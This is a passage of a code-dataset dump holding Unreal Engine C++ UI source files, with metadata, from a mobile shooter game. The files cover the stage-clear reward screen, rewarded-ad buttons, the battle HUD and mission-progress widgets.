TextMissionPoint);\t\t\t\n\n\t//===================================================\n\t// CanvasViewAD\n\t//===================================================\n\tPG_WIDGET_LINK(UButton, BtnADView);\n\tPG_WIDGET_LINK(UTextBlock, TextClearADTimer);\n\n\t//===================================================\n\t// CanvasTotalPoint\n\t//===================================================\n\tPG_WIDGET_LINK(UTextBlock, TextTotalPoint);\n\n\t//===================================================\n\t// CanvasBottomMenu\n\t//===================================================\n\tPG_WIDGET_LINK(UButton, BtnGoHome);\n\tPG_WIDGET_LINK(UButton, BtnRetry);\n\tPG_WIDGET_LINK(UButton, BtnNext);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\tpGameStateStage->OnViewAD.AddUObject(this, &UPG_UserWidgetScreenStageClear::OnViewResultAD);\n\n\t{\n\t\tm_pUserWidgetMessagePopup = CreateWidget<UPG_UserWidgetMessagePopup>(GetWorld(), LoadClass<UPG_UserWidgetMessagePopup>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_MessagePopup.WB_MessagePopup_C'\")));\n\t\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\n\t\tm_pUserWidgetMessagePopup->OnBtnClickedOK.AddUObject(this, &UPG_UserWidgetScreenStageClear::OnMessagePopupBoxClose);\n\t\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pUserWidgetMessagePopup->AddToViewport(999);\n\t}\n}\n\nvoid UPG_UserWidgetScreenStageClear::NativeTick(const FGeometry& MyGeometry, float DeltaTime)\n{\n\tSuper::NativeTick(MyGeometry, DeltaTime);\n\n\tif (false == m_bWasViewStageClear3X)\n\t{\n\t\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\t\tABCHECK(nullptr != pGameInstance);\n\n\t\tint32 nRemainTime = pGameInstance->GetADRemainTime(EADType::eAT_StageClear3X);\n\t\tSetBtnBonusADTime(nRemainTime);\n\t\tSetBtnEnableAD((nRemainTime <= 0));\n\t}\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetVisibility(ESlateVisibility InVisibility)\n{\n\tSuper::SetVisibility(InVisibility);\n\n\tif (ESlateVisibility::Hidden != InVisibility)\n\t{\n\t\tif (PopupPlaySound)\n\t\t\tPlaySound(PopupPlaySound);\n\t}\n}\n\nbool UPG_UserWidgetScreenStageClear::IsAbleViewStagePlayAD()\n{\n\tif (m_bWasViewStageClear3X)\n\t{\n\t\t// 스테이지 클리어 후 보상형 광고를 보았으면 스테이지 플레이 광고를 볼 수 없다.\n\t\treturn false;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\treturn pGameInstance->IsAbleADView(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetScreenStageClear::UpdateClearStageLayout()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tauto pTableStageData = pGameInstance->GetTableStageData(pGameModeStage->GetPlayStageID());\n\tABCHECK(nullptr != pTableStageData);\n\n\tm_pkTextTitle->SetText(FText::FromString(pTableStageData->StageName));\n\n\t// 몬스터 킬\n\tbool bIsClearAmount = pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill);\n\tbool bIsWasClearAmount = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_AmountKill);\n\tif (bIsClearAmount || bIsWasClearAmount)\n\t{\n\t\tm_pkBtnFlag->SetIsEnabled(false);\n\t\tSetBonusFlag(bIsWasClearAmount, pTableStageData->StarReward);\n\t}\n\telse\n\t{\n\t\tm_pkBtnFlag->SetIsEnabled(true);\n\t}\n\n\t// 필살기\n\tbool bIsClearLethal = pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal);\n\tbool bIsWasClearLethal = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_Lethal);\n\tif (bIsClearLethal || bIsWasClearLethal)\n\t{\n\t\tm_pkBtnLethal->SetIsEnabled(false);\n\t\tSetBonusLethal(bIsWasClearLethal, pTableStageData->StarReward);\n\t}\n\telse\n\t{\n\t\tm_pkBtnLethal->SetIsEnabled(true);\n\t}\n\n\t// 시간 \n\tbool bIsClearTime = pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime);\n\tbool bIsWasClearTime = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_ClearTime);\n\tif (bIsClearTime || bIsWasClearTime)\n\t{\n\t\tm_pkBtnTime->SetIsEnabled(false);\n\t\tSetBonusTime(bIsWasClearTime, pTableStageData->StarReward);\n\t}\n\telse\n\t{\n\t\tm_pkBtnTime->SetIsEnabled(true);\n\t}\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tSetBonusStageClear(pGameStateStage->GetClearStagePoint());\n\tSetBonusMonsterKill(pGameStateStage->GetClearMonsterKillPoint());\n\tSetBonusMissionPoint(pGameStateStage->GetClearMissionPoint());\n\tSetTotalReward(pGameStateStage->GetClearTotalPoint());\n}\n\nvoid UPG_UserWidgetScreenStageClear::ShowMessageBox(FString kTitle, FString kDescription)\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetTitle(kTitle);\n\tm_pUserWidgetMessagePopup->SetDescription(kDescription);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Visible);\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBonusFlag(bool bWasClear, int32 nBonus)\n{\n\tABCHECK(nullptr != m_pkImgIconFlagPrice);\n\tABCHECK(nullptr != m_pkTextFlagPoint);\n\n\tm_pkTextFlagPoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nBonus)));\n\n\tif (bWasClear)\n\t{\n\t\tm_pkImgIconFlagPrice->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pkTextFlagPoint->SetVisibility(ESlateVisibility::Hidden);\n\t}\n\telse\n\t{\n\t\tm_pkImgIconFlagPrice->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkTextFlagPoint->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBonusLethal(bool bWasClear, int32 nBonus)\n{\n\tABCHECK(nullptr != m_pkImgIconLethalPrice);\n\tABCHECK(nullptr != m_pkTextLethalPoint);\n\n\tm_pkTextLethalPoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nBonus)));\n\n\tif (bWasClear)\n\t{\n\t\tm_pkImgIconLethalPrice->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pkTextLethalPoint->SetVisibility(ESlateVisibility::Hidden);\n\t}\n\telse\n\t{\n\t\tm_pkImgIconLethalPrice->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkTextLethalPoint->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBonusTime(bool bWasClear, int32 nBonus)\n{\n\tABCHECK(nullptr != m_pkImgIconTimePrice);\n\tABCHECK(nullptr != m_pkTextTimePoint);\n\n\tm_pkTextTimePoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nBonus)));\n\n\tif (bWasClear)\n\t{\n\t\tm_pkImgIconTimePrice->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pkTextTimePoint->SetVisibility(ESlateVisibility::Hidden);\n\t}\n\telse\n\t{\n\t\tm_pkImgIconTimePrice->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkTextTimePoint->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBonusStageClear(int32 nStageClearBonus)\n{\n\tABCHECK(nullptr != m_pkTextStageClearPoint);\n\tm_pkTextStageClearPoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nStageClearBonus)));\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBonusMonsterKill(int32 nMonsterKillBonus)\n{\n\tABCHECK(nullptr != m_pkTextMonsterKillPoint);\n\tm_pkTextMonsterKillPoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nMonsterKillBonus)));\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBonusMissionPoint(int32 nStarBonus)\n{\n\tABCHECK(nullptr != m_pkTextMissionPoint);\n\tm_pkTextMissionPoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nStarBonus)));\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBtnBonusADTime(int32 nTime)\n{\n\tABCHECK(nullptr != m_pkTextClearADTimer);\n\tm_pkTextClearADTimer->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nTime)));\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBtnEnableAD(bool bEnable)\n{\n\tABCHECK(nullptr != m_pkBtnADView);\n\n\tif (m_pkBtnADView->bIsEnabled != bEnable)\n\t\tm_pkBtnADView->SetIsEnabled(bEnable);\n\n\tABCHECK(nullptr != m_pkTextClearADTimer);\n\tif (bEnable)\n\t\tm_pkTextClearADTimer->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tm_pkTextClearADTimer->SetVisibility(ESlateVisibility::HitTestInvisible);\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetTotalReward(int32 nTotalReward)\n{\n\tABCHECK(nullptr != m_pkTextTotalPoint);\n\tm_pkTextTotalPoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nTotalReward)));\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnBtnADview()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_StageClear3X);\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnBtnGoHome()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->SavePlayerData();\n\tpGameModeStage->SaveStageData();\n\n\tUGameplayStatics::OpenLevel(GetWorld(), TEXT(\"/Game/PG/Maps/Lobby/MainLobby\"));\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnBtnRetry()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->SavePlayerData();\n\tpGameModeStage->SaveStageData();\n\tpGameModeStage->RestartGame();\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnBtnNext()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->SavePlayerData();\n\tpGameModeStage->SaveStageData();\n\tpGameModeStage->StartGame_NextStage();\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnADRewardVideoSucessed()\n{\n\tm_bWasViewStageClear3X = true;\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\t// 보상 적용\n\tpGameStateStage->RequestViewAD();\n\n\tSetBtnEnableAD(false);\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnADRewardVideoError()\n{\n\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Failed to get the reward.\\nPlease try again later.\"));\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnADPlayStageVideoSucessed()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnADPlayStageVideoClosed()\n{\n\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnViewResultAD(bool bEnable)\n{\n\tUpdateClearStageLayout();\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnMessagePopupBoxClose()\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n}" }, { "alpha_fraction": 0.7459227442741394, "alphanum_fraction": 0.7459227442741394, "avg_line_length": 16.923076629638672, "blob_id": "0fb59d7e38c11cfae7e281454010c443fa0ca22b", "content_id": "deb0e247c70ebde8ddae643959b7be7bae2378b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1167, "license_type": "no_license", "max_line_length": 103, "num_lines": 65, "path": "/Source/Project_Gun/Public/UI/PG_HUDBattleStage.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_HUDBattleStage.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_HUDBattleStage : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected :\n\tvirtual void NativeConstruct() override;\n\t//virtual FReply NativeOnTouchEnded(const FGeometry& InGeometry, const FPointerEvent& InGestureEvent);\n\npublic :\n\tvoid BindPlayerState(class APG_MyPlayerState* APlayerState);\n\n\tvoid UpdateStageTimer();\n\tvoid UpdateRewardPoint();\n\tvoid UpdateLethalAttack();\n\npublic:\n\tUFUNCTION()\n\tvoid OnBtnRifle();\n\tUFUNCTION()\n\tvoid OnBtnFlame();\n\tUFUNCTION()\n\tvoid OnBtnShutgun();\n\tUFUNCTION()\n\tvoid OnBtnLaser();\n\tUFUNCTION()\n\tvoid OnBtnGrandle();\n\nprivate :\n\tUPROPERTY()\n\tclass UTextBlock* StageTimer;\n\t\n\tUPROPERTY()\n\tclass UTextBlock* RewardPoint;\n\n\tUPROPERTY()\n\tclass UTextBlock* LethalAttack;\n\n\tUPROPERTY()\n\tclass UButton* Btn_Rifle;\n\n\tUPROPERTY()\n\tclass UButton* Btn_Flame;\n\n\tUPROPERTY()\n\tclass UButton* Btn_Shutgun;\n\n\tUPROPERTY()\n\tclass UButton* Btn_Laser;\n\n\tUPROPERTY()\n\tclass UButton* Btn_Grandle;\n};\n" }, { "alpha_fraction": 0.7734929323196411, "alphanum_fraction": 0.785017728805542, "avg_line_length": 32.67910385131836, "blob_id": "04b2fecbbc09cbc72ee47f92d84ce0f4083a94da", "content_id": "3875b98f023d6b3f30d3a3a78541c9f78d1957da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4514, "license_type": "no_license", "max_line_length": 106, "num_lines": 134, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetPlayMissionState.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetPlayMissionState.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetPlayMissionState::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK(UButton, BtnFlag);\n\tPG_WIDGET_LINK(UButton, BtnLethal);\n\tPG_WIDGET_LINK(UButton, BtnTime);\n\n\tPG_WIDGET_LINK(UTextBlock, TextCurrFlag);\n\tPG_WIDGET_LINK(UTextBlock, TextCurrLethal);\n\tPG_WIDGET_LINK(UTextBlock, TextCurrTime);\n\n\tPG_WIDGET_LINK(UTextBlock, TextMaxFlag);\n\tPG_WIDGET_LINK(UTextBlock, TextMaxLethal);\n\n\tauto GameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (GameStateStage)\n\t{\n\t\tGameStateStage->UdpateWidgetPlayStage.AddUObject(this, &UPG_UserWidgetPlayMissionState::OnUpdateFlag);\n\t\tGameStateStage->UdpateWidgetPlayStage.AddUObject(this, &UPG_UserWidgetPlayMissionState::OnUpdateLethal);\n\t\tGameStateStage->UdpateWidgetPlayStage.AddUObject(this, &UPG_UserWidgetPlayMissionState::OnUpdateTime);\n\t}\n}\n\nvoid UPG_UserWidgetPlayMissionState::UpdateMissionFlag()\n{\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tconst FPGStagePlayData* pStagePlayData = pGameStateStage->GetStagePlayData();\n\tABCHECK(nullptr != pStagePlayData);\n\n\tSetDataFlag(pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill),\n\t\tpStagePlayData->NumberOfMonstersKilled,\n\t\tpStagePlayData->NumberOfMonsters);\n}\n\nvoid UPG_UserWidgetPlayMissionState::UpdateMissionLethal()\n{\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tconst FPGStagePlayData* pStagePlayData = pGameStateStage->GetStagePlayData();\n\tABCHECK(nullptr != pStagePlayData);\n\n\tSetDataLethal(pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal),\n\t\tpStagePlayData->NumberOfMonstersMuiltiKilled,\n\t\tpStagePlayData->NumberOfMonstersMuiltiKill);\n}\n\nvoid UPG_UserWidgetPlayMissionState::UpdateMissionTime()\n{\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tconst FPGStagePlayData* pStagePlayData = pGameStateStage->GetStagePlayData();\n\tABCHECK(nullptr != pStagePlayData);\n\n\tSetDataTime(pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime),\n\t\tpStagePlayData->RemainTime);\n}\n\nvoid UPG_UserWidgetPlayMissionState::SetDataFlag(bool bClear, int32 nCurrValue, int32 nMaxValue)\n{\n\tif (bClear)\n\t\tm_pkTextCurrFlag->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.968f, 0.6f)));\n\telse\n\t\tm_pkTextCurrFlag->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.0f, 0.0f)));\n\n\tm_pkBtnFlag->SetIsEnabled(!bClear);\n\n\tm_pkTextCurrFlag->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nCurrValue)));\n\tm_pkTextMaxFlag->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nMaxValue)));\n}\n\nvoid UPG_UserWidgetPlayMissionState::SetDataLethal(bool bClear, int32 nCurrValue, int32 nMaxValue)\n{\n\tif (bClear)\n\t\tm_pkTextCurrLethal->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.968f, 0.6f)));\n\telse\n\t\tm_pkTextCurrLethal->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.0f, 0.0f)));\n\n\tm_pkBtnLethal->SetIsEnabled(!bClear);\n\n\tm_pkTextCurrLethal->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nCurrValue)));\n\tm_pkTextMaxLethal->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nMaxValue)));\n}\n\nvoid UPG_UserWidgetPlayMissionState::SetDataTime(bool bClear, int32 nCurrTime)\n{\n\tif (bClear)\n\t\tm_pkTextCurrTime->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.968f, 0.6f)));\n\telse\n\t\tm_pkTextCurrTime->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.0f, 0.0f)));\n\n\tm_pkBtnTime->SetIsEnabled(!bClear);\n\n\tm_pkTextCurrTime->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nCurrTime)));\n}\n\nvoid UPG_UserWidgetPlayMissionState::OnUpdateFlag()\n{\n\tUpdateMissionFlag();\n}\n\nvoid UPG_UserWidgetPlayMissionState::OnUpdateLethal()\n{\n\tUpdateMissionLethal();\n}\n\nvoid UPG_UserWidgetPlayMissionState::OnUpdateTime()\n{\n\tUpdateMissionTime();\n}" }, { "alpha_fraction": 0.6124876141548157, "alphanum_fraction": 0.6171952486038208, "avg_line_length": 30.53125, "blob_id": "4be67dd2e8b49e0d743d99bf77323e00a9953d68", "content_id": "1e66787e4c5ad376cc84c2af92e9fe1303a2ded8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4334, "license_type": "no_license", "max_line_length": 95, "num_lines": 128, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetScreenStageClear.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetScreenStageClear.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetScreenStageClear : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\tvirtual void NativeTick(const FGeometry& MyGeometry, float DeltaTime) override;\n\npublic:\n\tvirtual void SetVisibility(ESlateVisibility InVisibility) override;\n\npublic :\n\t// 스테이지 플레이 광고 재생 가능한지 검사\n\tUFUNCTION(BlueprintCallable)\n\tbool IsAbleViewStagePlayAD();\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateClearStageLayout();\n\n\tUFUNCTION()\n\tvoid ShowMessageBox(FString kTitle, FString kDescription);\n\n\tvoid SetBonusFlag(bool bWasClear, int32 nBonus);\n\tvoid SetBonusLethal(bool bWasClear, int32 nBonus);\n\tvoid SetBonusTime(bool bWasClear, int32 nBonus);\n\tvoid SetBonusStageClear(int32 nStageClearBonus);\n\tvoid SetBonusMonsterKill(int32 nMonsterKillBonus);\n\tvoid SetBonusMissionPoint(int32 nStarBonus);\n\tvoid SetBtnBonusADTime(int32 nTime);\n\tvoid SetBtnEnableAD(bool bEnable);\n\tvoid SetTotalReward(int32 nTotalReward);\n\nprotected:\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnADview();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnGoHome();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnRetry();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnNext();\n\n\t//============================================================================================\n\t// 광고 시청에 대한 결과\n\t//============================================================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoSucessed();\t\t// 유저가 보상형 광고를 성공적으로 보았음 (3배 보상)\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoError();\t\t// 유저가 보상형 광고 보는중 닫거나 실패하였음\t(3배 보상)\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoSucessed();\t// 스테이지 플레이형 광고를 성공적으로 보았음\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoClosed();\t// 스테이지 플레이형 광고를 닫거나 실패하였음\n\t//============================================================================================\n\tUFUNCTION()\n\tvoid OnViewResultAD(bool bEnable);\n\n\t// 메시지 팝업박스\n\tUFUNCTION()\n\tvoid OnMessagePopupBoxClose();\n\nprotected:\n\tPG_WIDGET_DECLAR(UTextBlock, TextTitle);\n\n\t//===================================================\n\t// Canvas MissionState\n\t//===================================================\n\t// Flag\n\tPG_WIDGET_DECLAR(UButton, BtnFlag);\n\tPG_WIDGET_DECLAR(UImage, ImgIconFlagPrice);\n\tPG_WIDGET_DECLAR(UTextBlock, TextFlagPoint);\n\t// Lethal\n\tPG_WIDGET_DECLAR(UButton, BtnLethal);\n\tPG_WIDGET_DECLAR(UImage, ImgIconLethalPrice);\n\tPG_WIDGET_DECLAR(UTextBlock, TextLethalPoint);\n\t// Time\n\tPG_WIDGET_DECLAR(UButton, BtnTime);\n\tPG_WIDGET_DECLAR(UImage, ImgIconTimePrice);\n\tPG_WIDGET_DECLAR(UTextBlock, TextTimePoint);\n\t\n\t//===================================================\n\t// CanvasClearPointList\n\t//===================================================\n\tPG_WIDGET_DECLAR(UTextBlock, TextStageClearPoint);\t\t// 기본 스테이지 클리어 포인트 보상\n\tPG_WIDGET_DECLAR(UTextBlock, TextMonsterKillPoint);\t\t// 몬스터 킬 획득 포인트\n\tPG_WIDGET_DECLAR(UTextBlock, TextMissionPoint);\t\t\t// 미션 성공 포인트\n\n\t//===================================================\n\t// CanvasViewAD\n\t//===================================================\n\tPG_WIDGET_DECLAR(UButton, BtnADView);\n\tPG_WIDGET_DECLAR(UTextBlock, TextClearADTimer);\n\n\t//===================================================\n\t// CanvasTotalPoint\n\t//===================================================\n\tPG_WIDGET_DECLAR(UTextBlock, TextTotalPoint);\n\n\t//===================================================\n\t// CanvasBottomMenu\n\t//===================================================\n\tPG_WIDGET_DECLAR(UButton, BtnGoHome);\n\tPG_WIDGET_DECLAR(UButton, BtnRetry);\n\tPG_WIDGET_DECLAR(UButton, BtnNext);\n\n\n\tbool m_bWasViewStageClear3X = false;\n\n\tUPROPERTY(EditAnywhere, Category = \"PG Sound\")\n\tclass USoundBase* PopupPlaySound = nullptr;\n\n\t// 메시지 팝업\n\tUPROPERTY()\n\tclass UPG_UserWidgetMessagePopup* m_pUserWidgetMessagePopup = nullptr;\n};\n" }, { "alpha_fraction": 0.7892767786979675, "alphanum_fraction": 0.7917705774307251, "avg_line_length": 29.561904907226562, "blob_id": "811aeafde33b195dee03a8fcef079d8792bcdc39", "content_id": "d74136735d5a37721013eb1aef1bcbe7c4203f93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3218, "license_type": "no_license", "max_line_length": 107, "num_lines": 105, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetScreenPlayStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetScreenPlayStage.h\"\n#include \"UI/PG_UserWidgetPlayMissionState.h\"\n#include \"UI/PG_UserWidgetPlayStageWeaponBag.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Character/PG_MonChar.h\"\n\nvoid UPG_UserWidgetScreenPlayStage::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK(UPG_UserWidgetPlayMissionState, WB_MissionState);\n\tPG_WIDGET_LINK(UPG_UserWidgetPlayStageWeaponBag, WB_PlayStageWeaponBag);\n\n\tauto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\tif (MyPlayerState)\n\t{\n\t\tMyPlayerState->OnUpdateRewardPoint.AddUObject(this, &UPG_UserWidgetScreenPlayStage::OnChangeRewardPoint);\n\t}\n}\n\nvoid UPG_UserWidgetScreenPlayStage::Init()\n{\n\tInitPlayStageWeaponBag();\n\tInitPlayMissionState();\n\n\tOnChangeRewardPoint();\n}\n\nvoid UPG_UserWidgetScreenPlayStage::InitPlayStageWeaponBag()\n{\n\tABCHECK(nullptr != m_pkWB_PlayStageWeaponBag);\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tauto pMyPlayerData = pMyPlayerState->GetPlayingPlayerData();\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tauto pGameMode = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMode);\n\n\tint nSlotIndex = 0;\n\tfor (auto WeaponIndex : pMyPlayerData->PlayerWeaponInventory)\n\t{\n\t\tint nAmmo = pGameMode->GetMaxAmmo(WeaponIndex);\n\n\t\tm_pkWB_PlayStageWeaponBag->SetSlotWaponIndex(nSlotIndex, WeaponIndex);\n\t\tm_pkWB_PlayStageWeaponBag->SetSlotWeaponAmmo(nSlotIndex, nAmmo);\n\n\t\t// 유료 슬롯\n\t\tif (nSlotIndex == PG_MAX_WEAPON_SLOT - 1)\n\t\t\tm_pkWB_PlayStageWeaponBag->SetEnableSlot(nSlotIndex, pMyPlayerData->bExtendWeaponSlot);\n\t\telse\n\t\t\tm_pkWB_PlayStageWeaponBag->SetEnableSlot(nSlotIndex, true);\n\n\t\tnSlotIndex++;\n\t}\n\n\tUpdateWeaponSlotLightBox();\n}\n\nvoid UPG_UserWidgetScreenPlayStage::InitPlayMissionState()\n{\n\tABCHECK(nullptr != m_pkWB_MissionState);\n\n\tm_pkWB_MissionState->UpdateMissionFlag();\n\tm_pkWB_MissionState->UpdateMissionLethal();\n\tm_pkWB_MissionState->UpdateMissionTime();\n}\n\nvoid 